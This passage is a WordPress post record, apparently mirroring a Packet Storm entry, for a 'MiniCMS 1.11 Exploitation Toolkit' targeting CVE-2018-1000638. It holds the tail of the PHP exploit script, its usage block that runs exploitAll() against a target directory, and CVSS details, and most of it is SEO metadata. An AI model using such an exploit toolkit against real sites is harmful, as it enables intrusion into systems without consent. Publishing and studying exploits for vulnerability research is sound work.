\\&#8221;[+] Cleaned up temporary files\\\\n\\&#8221;;\\n            }\\n        }\\n    }\\n    \\n    \/**\\n     * Usage Example\\n     *\/\\n    if (php_sapi_name() === &#8216;cli&#8217; \\u0026\\u0026 isset($argv[1])) {\\n        $exploiter = new MiniCMSExploiter($argv[1]);\\n        $exploiter-\\u003eexploitAll();\\n        \\n        \/\/ Optional: cleanup\\n        if (isset($argv[2]) \\u0026\\u0026 $argv[2] == &#8216;&#8211;cleanup&#8217;) {\\n            $exploiter-\\u003ecleanup();\\n        }\\n    } else {\\n        echo \\&#8221;Usage: php \\&#8221; . basename(__FILE__) . \\&#8221; \\u003ctarget_directory\\u003e [&#8211;cleanup]\\\\n\\&#8221;;\\n        echo \\&#8221;Example: php \\&#8221; . basename(__FILE__) . \\&#8221; \/var\/www\/html\/minicms\\\\n\\&#8221;;\\n    }\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214666&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:6.1,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:L\/I:L\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;3.0&#8243;,&#8221;vectorString&#8221;:&#8221;CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:L\/I:L\/A:N&#8221;,&#8221;baseScore&#8221;:6.1,&#8221;baseSeverity&#8221;:&#8221;MEDIUM&#8221;,&#8221;attackVector&#8221;:&#8221;NETWORK&#8221;,&#8221;attackComplexity&#8221;:&#8221;LOW&#8221;,&#8221;privilegesRequired&#8221;:&#8221;NONE&#8221;,&#8221;userInteraction&#8221;:&#8221;REQUIRED&#8221;,&#8221;scope&#8221;:&#8221;CHANGED&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;LOW&#8221;,&#8221;integrityImpact&#8221;:&#8221;LOW&#8221;,&#8221;availabilityImpact&#8221;:&#8221;NONE&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214666\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:17&#8243;,&#8221;description&#8221;:&#8221;This toolkit focuses on validating and demonstrating the impact of a known and documented design flaw in MiniCMS 1.11 related to its build process CVE-2018-1000638&#8230;.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,31,12,21,13,53,7,11,5],"class_list":["post-38540","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-61","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38540\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:17&#8243;,&#8221;description&#8221;:&#8221;This toolkit focuses on validating and demonstrating the impact of a known and documented design flaw in MiniCMS 1.11 related to its build process CVE-2018-1000638....\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38540\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-02T11:40:36+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38540#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38540\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666\",\"datePublished\":\"2026-02-02T11:40:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38540\"},\"wordCount\":2932,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.1\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38540#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38540\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38540\",\"name\":\"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-02T11:40:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38540#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38540\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38540#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38540","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:17&#8243;,&#8221;description&#8221;:&#8221;This toolkit focuses on validating and demonstrating the impact of a known and documented design flaw in MiniCMS 1.11 related to its build process CVE-2018-1000638....","og_url":"https:\/\/zero.redgem.net\/?p=38540","og_site_name":"zero redgem","article_published_time":"2026-02-02T11:40:36+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38540#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38540"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666","datePublished":"2026-02-02T11:40:36+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38540"},"wordCount":2932,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.1","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38540#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38540","url":"https:\/\/zero.redgem.net\/?p=38540","name":"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-02T11:40:36+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38540#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38540"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38540#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38540"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38540\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38540"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38540"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}